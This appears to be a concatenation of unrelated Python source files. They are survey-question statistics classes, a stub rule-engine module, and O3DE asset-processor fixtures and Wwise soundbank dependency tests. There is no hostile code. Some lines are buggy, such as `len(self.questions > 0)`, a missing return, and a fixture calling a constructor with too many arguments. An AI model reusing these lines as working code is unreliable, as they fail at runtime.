def freq_table_to_json(self, df): return('') def questions_to_json(self): return('') class SelectOneMatrixQuestion(MatrixQuestion): def get_choices(self, remove_exclusions=True, show_values=False): self.assert_choices_same() if len(self.questions) > 0: return(self.questions[0].scale.choices_to_str(remove_exclusions, show_values)) else: return([]) def frequency_table(self, df, show="ct", pct_format=".0%", remove_exclusions = True, show_totals=True, show_mean=True, mean_format=".1f"): if len(self.questions) == 0: return(pd.DataFrame()) data = [] if show == "ct": for q in self.questions: data.append(q.frequency_table(df, False, True, False, pct_format, remove_exclusions, show_totals, show_mean, ).iloc[:,0].tolist()) elif show == "pct": for q in self.questions: data.append(q.frequency_table(df, False, False, True, pct_format, remove_exclusions, show_totals, show_mean ).iloc[:,0].tolist()) else: raise(Exception("Invalid 'show' parameter: {}".format(show))) tbl = pd.DataFrame(data) tmpcols = self.get_choices(remove_exclusions) if show_totals: tmpcols.append("Total") if show_mean: tmpcols.append("Mean") tbl.columns = tmpcols tbl["Question"] = self.get_children_text() cols = tbl.columns.tolist() cols = cols[-1:] + cols[:-1] tbl = tbl[cols] return(tbl) def cut_by_question(self, other_question, response_set, cut_var_label=None, question_labels=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): if type(other_question) != SelectOneQuestion: raise(Exception("Can only call cut_by_question on a SelectOneQuestion type")) groups = response_set.groupby(other_question.label) group_mapping = dict(zip(other_question.values, other_question.choices)) oth_text = cut_var_label if not oth_text: oth_text = other_question.text return(self.cut_by(groups, group_mapping, oth_text, question_labels, pct_format, remove_exclusions, show_mean, mean_format)) def cut_by(self, groups, group_label_mapping, cut_var_label, question_labels=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): results = [] labels = question_labels if not labels: labels = [q.text for q in self.questions] for q, l in zip(self.questions, labels): r = q.cut_by(groups, group_label_mapping, cut_var_label, l, pct_format, remove_exclusions, show_mean, mean_format) # r.columns = pd.MultiIndex.from_tuples([(q.text, b) for a, b in # r.columns.tolist()]) results.append(r.T) return(pd.concat(results)) def freq_table_to_json(self, df): t = self.frequency_table(df, "ct", "", True, False, False, "") return(t.iloc[:, 1:].to_json(orient="records")) def questions_to_json(self): df = pd.DataFrame({"Question": self.get_children_text()}) return(df.to_json(orient="records")) def graph_type(self): if len(self.questions) > 0: if type(self.questions[0].scale) == LikertScale: return('diverging_bar') else: return('horizontal_stacked_bar') else: return('') class SelectMultipleMatrixQuestion(MatrixQuestion): def get_choices(self, remove_exclusions=True): self.assert_choices_same() if len(self.questions > 0): return(self.questions[0].get_choices(remove_exclusions)) else: [] def frequency_table(self, df, show="ct", pct_format=".0%", remove_exclusions = True, show_totals=True): data = [] if show == "ct": for q in self.questions: data.append(q.frequency_table(df, False, True, False, False, pct_format, remove_exclusions, False).iloc[:,0].tolist()) elif show == "pct_respondents": for q in self.responses: data.append(q.frequency_table(df, False, False, True, False, pct_format, remove_exclusions, False).iloc[:,0].tolist()) elif show == "pct_responses": for q in self.responses: data.append(q.frequency_table(df, False, False, False, True, pct_format, remove_exclusions, False).iloc[:,0].tolist()) else: raise(Exception("Invalid 'show' parameter: {}".format(show))) tbl = pd.DataFrame(data) tbl.columns = self.get_choices(remove_exclusions) tbl["Question"] = self.get_children_text() cols = tbl.columns.tolist() cols = cols[-1:] + cols[:-1] tbl = tbl[cols] if show_totals: tots = [] for q in self.questions: tots.append(q.get_total_respondents(df)) tbl["Total Respondents"] = tots return(tbl) class SelectQuestion: __metaclass__ = ABCMeta def get_total_respondents(self, df): freqs, resp, nonresp = self.tally(df) return(resp) def get_scale(self): return(self.scale) def change_scale(self, newtype, values = None, midpoint = None): self.scale = QuestionScale.change_scale(self.scale, newtype) def change_midpoint(self, midpoint): self.scale.midpoint = midpoint def exclude_choices_from_analysis(self, choices): self.scale.exclude_choices_from_analysis(choices) @abstractmethod def get_variable_names(self): pass @abstractmethod def pretty_print(self): pass @abstractmethod def pretty_print_choices(self): pass @abstractmethod def tally(self): pass @abstractmethod def frequency_table(self): pass def questions_to_json(self): return('') class SelectOneQuestion(SelectQuestion): def __init__(self, text, var, choices, label, values, exclude_from_analysis, matrix=None, scale_type='likert'): self.text = text self.label = label self.variable = var self.matrix = matrix self.scale = QuestionScale.create_scale(scale_type, choices, exclude_from_analysis, values) def get_variable_names(self): return([self.variable]) def pretty_print(self, show_choices=True): print("{} ({})".format(self.text, self.label)) if show_choices: self.pretty_print_choices() def pretty_print_choices(self): print(", ".join(self.scale.choices_to_str(False))) def reverse_choices(self): self.scale.reverse_choices() def mean(self, df, remove_exclusions=True): values = self.scale.get_values(remove_exclusions) freq, n, x = self.tally(df, remove_exclusions) num = sum([ct * v for ct, v in zip(freq, values)]) if n > 0: return(num/n) else: return(np.nan) def tally(self, df, remove_exclusions=True): """ Returns ([response frequencies], respondents, nonrespondents) tuple where response frequencies is a count of responses for each answer choice in order. """ unit_record = df[self.variable] freqs = dict(unit_record.value_counts()) cts = [] values = self.scale.get_values(remove_exclusions) for k in values: if k in freqs: cts.append(freqs[k]) else: cts.append(0) return((cts, sum(cts), len(unit_record)-sum(cts))) def frequency_table(self, df, show_question=True, ct=True, pct=True, pct_format=".0%", remove_exclusions=True, show_totals=True, show_mean=True, mean_format=".1f", show_values=True): cts, resp, nonresp = self.tally(df, remove_exclusions) data = [] cols = [] tots = [] mean = [] if show_question: data.append(self.scale.choices_to_str(remove_exclusions, show_values)) cols.append("Answer") tots.append("Total") mean.append("Mean") if ct: data.append(cts) cols.append("Count") tots.append(resp) mean.append(format(self.mean(df, remove_exclusions), mean_format)) if pct: l = [] for x in cts: if resp > 0: l.append(format(x/resp, pct_format)) else: l.append("-") data.append(l) cols.append("%") tots.append(format(1, pct_format)) if not ct: mean.append(format(self.mean(df, remove_exclusions), mean_format)) else: mean.append("") tbl = pd.DataFrame(data).T tbl.columns = cols if show_totals: tbl.loc[len(tbl)] = tots if show_mean: tbl.loc[len(tbl)] = mean return(tbl) def cut_by_question(self, other_question, response_set, cut_var_label=None, question_label=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): if type(other_question) != SelectOneQuestion: raise(Exception("Can only call cut_by_question on a SelectOneQuestion type")) df = response_set.data.copy() # Here we remove the exclusions for the cut variable, the # exclusions for this question are removed in cut_by, if # appropriate if remove_exclusions: values_to_drop = other_question.scale.excluded_choices() for v in values_to_drop: df[other_question.variable].replace(v, np.nan, inplace=True) groups = df.groupby(other_question.label) group_mapping = dict(zip(other_question.scale.values, other_question.scale.choices)) oth_text = cut_var_label if not oth_text: oth_text = other_question.text return(self.cut_by(groups, group_mapping, oth_text, question_label, pct_format, remove_exclusions, show_mean, mean_format)) def cut_by(self, groups, group_label_mapping, cut_var_label, question_label=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): freqs = [] for k, gp in groups: t = (self.frequency_table(gp, True, False, True, pct_format, remove_exclusions, False, show_mean, mean_format)) t.set_index("Answer", inplace=True) series = t.ix[:,0] series.name = group_label_mapping[k] freqs.append(series) df = pd.DataFrame(freqs) if show_mean: if self.compare_groups(groups): df.columns = df.columns.tolist()[:-1] + \ [df.columns.tolist()[-1]+"*"] my_label = question_label if not my_label: my_label = self.text # Add hierarchical index to rows top_index = [cut_var_label]*len(groups) df.index = pd.MultiIndex.from_arrays([top_index, df.index.tolist()]) # Add hierarchical index to columns col_top_index = [my_label]*len(self.scale.get_choices(remove_exclusions)) if show_mean: col_top_index += [my_label] df.columns = pd.MultiIndex.from_arrays([col_top_index, df.columns.tolist()]) return(df) def compare_groups(self, groupby, pval = .05): data = [d[self.variable].dropna() for groupname, d in groupby] if len(groupby) == 2: ts, ps = ttest_ind(*data, equal_var=False) return(ps < pval) elif len(groupby.groups.keys()) == 2: # ANOVA f, p = f_oneway(*data) return(p < .05) else: return(False) def freq_table_to_json(self, df): t = self.frequency_table(df, True, True, True, ".9f", True, False, False, ".1f", False) t.columns = ["category", "count", "pct"] return(t.to_json(orient="records")) def graph_type(self): return('horizontal_bar') class SelectMultipleQuestion(SelectQuestion): def __init__(self, text, vars, choices, label, exclude_from_analysis, matrix=None): self.text = text self.label = label self.variables = vars self.matrix = matrix self.scale = QuestionScale.create_scale('nominal', choices, exclude_from_analysis) def get_variable_names(self): return(self.variables) def reverse_choices(self): self.scale.reverse_choices() self.variables.reverse() def pretty_print(self, show_choices=True): print("{} ({})".format(self.text, self.label)) if show_choices: self.pretty_print_choices() def pretty_print_choices(self): l = [] for c, v, x in zip(self.scale.choices, self.variables, self.scale.exclude_from_analysis): if x: l.append("{} (X)".format(c)) else: l.append("{} ({})".format(c, v)) print(", ".join(l)) def tally(self, df, remove_exclusions=True): """ Returns (list, int1, int2) tuple where list is a count of responses for each answer choice. Int1 is the number of respondents, and int2 is the number of nonrespondents. """ vars = self.variables if remove_exclusions: vars = list(compress(vars, [not x for x in self.scale.exclude_from_analysis])) unit_record = df[vars] nonrespondents = 0 respondents = 0 cts = [0]*len(vars) for index, row in unit_record.iterrows(): if row.dropna().empty: nonrespondents += 1 else: respondents += 1 ct = 0 for i, v in row.iteritems(): if not np.isnan(v): cts[ct] += 1 ct += 1 return(cts, respondents, nonrespondents) def frequency_table(self, df, show_question=True, ct=True, pct_respondents=True, pct_responses=False, pct_format=".0%", remove_exclusions=True, show_totals=True): cts, resp, nonresp = self.tally(df, remove_exclusions) data = [] cols = [] tots = [] if show_question: data.append(self.scale.get_choices(remove_exclusions)) cols.append("Answer") tots.append("Total respondents") if ct: data.append(cts) cols.append("Count") tots.append(resp) if pct_respondents: data.append([format(x/resp, pct_format) for x in cts]) cols.append("% of respondents") tots.append("") if pct_responses: data.append([format(x/sum(cts), pct_format) for x in cts]) cols.append("% of responses") tots.append("") tbl = pd.DataFrame(data).T tbl.columns = cols if show_totals: tbl.loc[len(tbl)] = tots return(tbl) def cut_by_question(self, other_question, response_set, cut_var_label=None, question_label=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): if type(other_question) != SelectOneQuestion: raise(Exception("Can only call cut_by_question on a SelectOneQuestion type")) df = response_set.copy() # Here we remove the exclusions for the cut variable, the # exclusions for this question are removed in cut_by, if # appropriate if remove_exclusions: values_to_drop = [v for v, e in zip(other_question.values, other_question.scale.exclude_from_analysis) if e] for v in values_to_drop: df[other_question.variable].replace(v, np.nan, inplace=True) groups = df.groupby(other_question.label) group_mapping = dict(zip(other_question.scale.values, other_question.scale.choices)) oth_text = cut_var_label if not oth_text: oth_text = other_question.text return(self.cut_by(groups, group_mapping, oth_text, question_label, pct_format, remove_exclusions)) def cut_by(self, groups, group_label_mapping, cut_var_label, question_label=None, pct_format=".0%", remove_exclusions=True): freqs = [] for k, gp in groups: t = (self.frequency_table(gp, True, False, True, False, pct_format, remove_exclusions, False)) t.set_index("Answer", inplace=True) series = t.ix[:,0] series.name = group_label_mapping[k] freqs.append(series) df = pd.DataFrame(freqs) my_label = question_label if not my_label: my_label = self.text # Add significance flags sigs = self.compare_groups(groups, remove_exclusions) newcols = [] for s, i in zip(sigs, df.columns.tolist()): if s: newcols.append(i + "*") else: newcols.append(i) # Add hierarchical index to rows top_index = [cut_var_label]*len(groups) df.index = pd.MultiIndex.from_arrays([top_index, df.index.tolist()]) # Add hierarchical index to columns col_top_index = [my_label]*len(self.choices) df.columns = pd.MultiIndex.from_arrays([col_top_index, newcols]) return(df) def compare_groups(self, groupby, remove_exclusions=True, pval = .05): groupnames = groupby.groups.keys() obs_by_cut = [] ct_by_cut = [] for k, df in groupby: freqs, tot_resp, tot_nonresp = self.tally(df, remove_exclusions) obs_by_cut.append(freqs) ct_by_cut.append(tot_resp) choice_totals = [sum(x) for x in zip(*obs_by_cut)] exp_prop_per_choice = [t/sum(ct_by_cut) for t in choice_totals] sigs = [] for f_obs, choice_tot, p_choice in zip(zip(*obs_by_cut), choice_totals, exp_prop_per_choice): f_exp = [p_choice * ct for ct in ct_by_cut] chisq, p = chisquare(f_obs, f_exp) sigs.append(p < pval) return(sigs) def freq_table_to_json(self, df): t = self.frequency_table(df, True, True, True, False, ".9f", True, False) t.columns = ["category", "count", "pct"] return(t.to_json(orient="records")) def graph_type(self): return('horizontal_bar') ```
{ "source": "aaaron7/LGPC", "score": 3 }
#### File: LGPC/parser/rule.py ```python import sys import json import os from os import listdir from os.path import isfile, join import requests import time import random import json import urllib from LGPC.utils import packet,status class RuleContext: def __init__(self) -> None: self.streams = {} pass def add_packet(self, packet, stream_name) -> None: if stream_name not in self.streams: self.streams[stream_name] = [] self.streams[stream_name].append(packet) def pop_packet(self, stream_name) -> None: self.streams[stream_name].pop() def get_input(self , index : int) -> packet.Packet: pass def write_output(self, index : int, packet : packet.Packet) -> status.Status: pass class RuleConfig: def __init__(self,name, input_names, output_names) -> None: self.name = name self.input_names = input_names self.output_names = output_names pass class Rule: """ All rules are using immediate input policy by default. it means that process will be called any of input is ready. """ def __init__(self): pass def prepare(self, context : RuleContext, config : RuleConfig) -> status.Status: pass def process(self, context : RuleContext, config : RuleConfig) -> status.Status: pass def close(self, context : RuleContext, config : RuleConfig) -> status.Status: pass if __name__ == "__main__": pass ```
{ "source": "aaarsene/o3de", "score": 2 }
#### File: assetpipeline/ap_fixtures/ap_config_default_platform_fixture.py ```python import pytest from . import asset_processor_fixture as asset_processor from . import ap_config_backup_fixture as ap_config_backup_fixture @pytest.fixture def ap_config_default_platform_fixture(request, workspace, asset_processor, ap_config_backup_fixture) -> None: asset_processor.disable_all_asset_processor_platforms() ``` #### File: assetpipeline/ap_fixtures/ap_idle_fixture.py ```python import pytest import os import time # Import fixtures from . import ap_setup_fixture # Import LyTestTools import ly_test_tools.environment.waiter as waiter from ly_test_tools.o3de.ap_log_parser import APLogParser @pytest.mark.usefixtures("test_assets") class TimestampChecker(object): def __init__(self, file_path, timeout) -> None: self.file = file_path self.timeout = timeout self.original_mod_time = int(round(time.time() * 1000)) self.start_time = time.time() self.log = None def set_file_path(self, file_path): self.file = file_path def grab_current_timestamp(self) -> None: self.original_mod_time = int(round(time.time() * 1000)) def check_if_idle(self, timeout=None, starttime=None, updatetime_max=30) -> None: if timeout is None: timeout = self.timeout if starttime: time.sleep(starttime) def log_reports_idle() -> bool: """ Grabs the current log run and reads it line by line from the bottom up Returns whether the idle message appears later in the log than the latest "Processing [...]" message """ if updatetime_max and os.path.exists(self.file): last_file_update = os.path.getmtime(self.file) timedelta = time.time() - last_file_update if timedelta > updatetime_max: # Has the file exceeded the limit # Additionally we want to make sure the test has exceeded the limit so we don't catch # a log from a previous run where our current test hasn't engaged any action from AP if time.time() - self.start_time > updatetime_max: return True self.log = APLogParser(self.file) line_index = len(self.log.runs[-1]["Lines"]) - 1 while line_index > 0: line = self.log.runs[-1]["Lines"][line_index] timestamp = self.log.runs[-1]["Timestamps"][line_index] if self.log.get_line_type(line) == "AssetProcessor": message = self.log.remove_line_type(line) if timestamp <= self.original_mod_time: return False elif message.startswith("Processing"): return False elif "Job processing completed. Asset Processor is currently idle." in message: self.original_mod_time = timestamp return True line_index -= 1 waiter.wait_for(lambda: (log_reports_idle()), timeout=timeout or self.timeout) @pytest.fixture def ap_idle_fixture(request, workspace, timeout: int) -> TimestampChecker: """ Allows checking the GUI for idle by grabbing the initial modified time of the log file and looking for new "idle" messages later """ return TimestampChecker(workspace.paths.ap_gui_log(), timeout, workspace) ``` #### File: assetpipeline/wwise_bank_dependency_tests/bank_info_parser_tests.py ```python import os import pytest import sys soundbanks_xml_filename = 'SoundbanksInfo.xml' @pytest.fixture def soundbank_metadata_generator_setup_fixture(workspace): resources = dict() resources['tests_dir'] = os.path.dirname(os.path.realpath(__file__)) return resources def success_case_test(test_folder, expected_dependencies_dict, bank_info, expected_result_code=0): """ Test Steps: 1. Make sure the return code is what was expected, and that the expected number of banks were returned. 2. Validate bank is in the expected dependencies dictionary. 3. Validate the path to output the metadata file to was assembled correctly. 4. Validate metadata object for this bank is set, and that it has an object assigned to its dependencies field and its includedEvents field 5. Validate metadata object has the correct number of dependencies, and validated that every expected dependency exists in the dependencies list of the metadata object. 6. Validate metadata object has the correct number of events, and validate that every expected event exists in the events of the metadata object. """ expected_bank_count = len(expected_dependencies_dict) banks, result_code = bank_info.generate_metadata( os.path.join(test_folder, soundbanks_xml_filename), test_folder) # Make sure the return code is what was expected, and that the expected number of banks were returned. assert result_code is expected_result_code assert len(banks) is expected_bank_count for bank_index in range(expected_bank_count): bank = banks[bank_index] # Find a bank of this name in the expected dependencies dictionary. assert bank.path in expected_dependencies_dict # Make sure the path to output the metadata file to was assembled correctly. expected_metadata_filepath = os.path.splitext(os.path.join(test_folder, bank.path))[0] + \ bank_info.metadata_file_extension assert bank.metadata_path == expected_metadata_filepath # Make sure the metadata object for this bank is set, and that it has an object assigned to # its dependencies field and its includedEvents field assert bank.metadata_object assert bank.metadata_object['dependencies'] is not None assert bank.metadata_object['includedEvents'] is not None # Make sure the generated metadata object has the correct number of dependencies, and validated that every # expected dependency exists in the dependencies list of the metadata object. assert len(bank.metadata_object['dependencies']) is len(expected_dependencies_dict[bank.path]['dependencies']) for dependency in expected_dependencies_dict[bank.path]['dependencies']: assert dependency in bank.metadata_object['dependencies'] # Make sure the generated metadata object has the correct number of events, and validate that every expected # event exists in the events list of the metadata object. assert len(bank.metadata_object['includedEvents']) is len(expected_dependencies_dict[bank.path]['events']) for event in expected_dependencies_dict[bank.path]['events']: assert event in bank.metadata_object['includedEvents'] def get_bank_info(workspace): sys.path.append( os.path.join(workspace.paths.engine_root(), 'Gems', 'AudioEngineWwise', 'Tools')) from WwiseAuthoringScripts import bank_info_parser as bank_info_module return bank_info_module @pytest.mark.usefixtures("workspace") @pytest.mark.SUITE_periodic @pytest.mark.parametrize("project", ["AutomatedTesting"]) class TestSoundBankMetadataGenerator: def test_NoMetadataTooFewBanks_ReturnCodeIsError(self, workspace, soundbank_metadata_generator_setup_fixture): """ Trying to generate metadata for banks in a folder with one or fewer banks and no metadata is not possible and should fail. Test Steps: 1. Setup testing environment with only 1 bank file 2. Get Sound Bank Info 3. Attempt to generate sound bank metadata 4. Verify that proper error code is returned """ # test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataTooFewBanks_ReturnCodeIsError') if not os.path.isdir(test_assets_folder): os.makedirs(test_assets_folder) bank_info = get_bank_info(workspace) banks, error_code = bank_info.generate_metadata( os.path.join(test_assets_folder, soundbanks_xml_filename), test_assets_folder) os.rmdir(test_assets_folder) assert error_code is 2, 'Metadata was generated when there were fewer than two banks in the target directory.' def test_NoMetadataNoContentBank_NoMetadataGenerated(self, workspace, soundbank_metadata_generator_setup_fixture): """ Test Steps: 1. Setup testing environment 2. No expected dependencies 3. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataNoContentBank_NoMetadataGenerated') expected_dependencies = dict() success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_NoMetadataOneContentBank_NoStreamedFiles_OneDependency(self, workspace, soundbank_metadata_generator_setup_fixture): """ When no Wwise metadata is present, and there is only one content bank in the target directory with no wem files, then only the content bank should have metadata associated with it. The generated metadata should only describe a dependency on the init bank. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataOneContentBank_NoStreamedFiles_OneDependency') bank_info = get_bank_info(workspace) expected_dependencies = {'Content.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []},} success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_NoMetadataOneContentBank_StreamedFiles_MultipleDependencies(self, workspace, soundbank_metadata_generator_setup_fixture): """ When no Wwise metadata is present, and there is only one content bank in the target directory with wem files present, then only the content bank should have metadata associated with it. The generated metadata should describe a dependency on the init bank and all wem files in the folder. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataOneContentBank_StreamedFiles_MultipleDependencies') bank_info = get_bank_info(workspace) expected_dependencies = { 'Content.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem', '791740036.wem' ], 'events': [] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_NoMetadataMultipleBanks_OneDependency_ReturnCodeIsWarning(self, workspace, soundbank_metadata_generator_setup_fixture): """ When no Wwise metadata is present, and there are multiple content banks in the target directory with wem files present, there is no way to tell which bank requires which wem files. A warning should be emitted, stating that the full dependency graph could not be created, and only dependencies on the init bank are described in the generated metadata files. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataMultipleBanks_OneDependency_ReturnCodeIsWarning') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []}, 'test_bank2.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []} } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace), expected_result_code=1) def test_OneContentBank_NoStreamedFiles_OneDependency(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes one content bank that contains all media needed by its events. Generated metadata describes a dependency only on the init bank. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_OneContentBank_NoStreamedFiles_OneDependency') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_1_bank1_embedded_target'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_OneContentBank_StreamedFiles_MultipleDependencies(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes one content bank that references streamed media files needed by its events. Generated metadata describes dependencies on the init bank and wems named by the IDs of referenced streamed media. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_OneContentBank_StreamedFiles_MultipleDependencies') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem', '791740036.wem' ], 'events': [ 'test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target' ] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_NoStreamedFiles_OneDependency(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Each bank contains all media needed by its events. Generated metadata describes each bank having a dependency only on the init bank. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_NoStreamedFiles_OneDependency') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_1_bank1_embedded_target'] }, 'test_bank2.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_3_bank2_embedded_target', 'test_event_4_bank2_streamed_target'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_Bank1StreamedFiles(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Bank 1 references streamed media files needed by its events, while bank 2 contains all media need by its events. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_Bank1StreamedFiles') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target'] }, 'test_bank2.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_3_bank2_embedded_target', 'test_event_4_bank2_streamed_target'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_SplitBanks_OnlyBankDependenices(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Bank 3 events require media that is contained in bank 4. Generated metadata describes each bank having a dependency on the init bank, while bank 3 has an additional dependency on bank 4. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_SplitBanks_OnlyBankDependenices') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank3.bnk': { 'dependencies': [ bank_info.init_bank_path, 'test_bank4.bnk' ], 'events': ['test_event_5_bank3_embedded_target_bank4'] }, 'test_bank4.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []} } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_ReferencedEvent_MediaEmbeddedInBank(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Bank 1 contains all media required by its events, while bank 5 contains a reference to an event in bank 1, but no media for that event. Generated metadata describes both banks having a dependency on the init bank, while bank 5 has an additional dependency on bank 1. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_ReferencedEvent_MediaEmbeddedInBank') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_1_bank1_embedded_target'] }, 'test_bank5.bnk': { 'dependencies': [ bank_info.init_bank_path, 'test_bank1.bnk' ], 'events': ['test_event_1_bank1_embedded_target', 'test_event_7_bank5_referenced_event_bank1_embedded'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_ReferencedEvent_MediaStreamed(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Bank 1 references streamed media files needed by its events, while bank 5 contains a reference to an event in bank 1. This causes bank 5 to also describe a reference to the streamed media file referenced by the event from bank 1. Generated metadata describes both banks having dependencies on the init bank, as well as the wem named by the ID of referenced streamed media. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_ReferencedEvent_MediaStreamed') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_2_bank1_streamed_target'] }, 'test_bank5.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_2_bank1_streamed_target', 'test_event_8_bank5_referenced_event_bank1_streamed'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_ReferencedEvent_MixedSources(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Bank 1 references a streamed media files needed by one of its events, and contains all media needed for its other events, while bank 5 contains a reference to two events in bank 1: one that requires streamed media, and one that requires media embedded in bank 1. Generated metadata describes both banks having dependencies on the init bank and the wem named by the ID of referenced streamed media, while bank 5 has an additional dependency on bank 1. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_ReferencedEvent_MixedSources') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target'] }, 'test_bank5.bnk': { 'dependencies': [ bank_info.init_bank_path, 'test_bank1.bnk', '590205561.wem' ], 'events': [ 'test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target', 'test_event_7_bank5_referenced_event_bank1_embedded', 'test_event_8_bank5_referenced_event_bank1_streamed' ] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_VaryingDependencies_MixedSources(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks that have varying dependencies on each other, and dependencies on streamed media files. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_VaryingDependencies_MixedSources') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target'] }, 'test_bank2.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_3_bank2_embedded_target', 'test_event_4_bank2_streamed_target'] }, 'test_bank3.bnk': { 'dependencies': [ bank_info.init_bank_path, '791740036.wem', 'test_bank4.bnk' ], 'events': ['test_event_5_bank3_embedded_target_bank4', 'test_event_6_bank3_streamed_target_bank4'] }, 'test_bank4.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []}, 'test_bank5.bnk': { 'dependencies': [ bank_info.init_bank_path, 'test_bank1.bnk', '590205561.wem' ], 'events': [ 